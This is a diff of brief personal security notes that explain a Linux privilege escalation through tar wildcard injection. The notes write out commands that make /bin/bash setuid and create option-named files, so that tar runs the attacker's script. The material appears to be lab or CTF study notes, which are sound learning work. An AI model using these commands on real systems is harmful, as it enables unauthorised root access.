shatternox/cyber-stuff/notes.md

 echo "chmod +s /bin/bash" > exploit.sh
 2. touch /home/user/--checkpoint=1
 3. touch /home/user/--checkpoint-action=exec=sh\ exploit.sh
-4. The touch and checkpoint command will make the tar command to execute the exploit.sh which allow us to escalate our privillege
+4. Because of the wild card being used, the --checkpoint=1 and --checkpoint-action=exec=sh\ exploit.sh will actually be included in the tar command, resulting our exploit.sh to be executed

+tar --checkpoint=1 --checkpoint-action=exec=sh exploit.sh >> Like this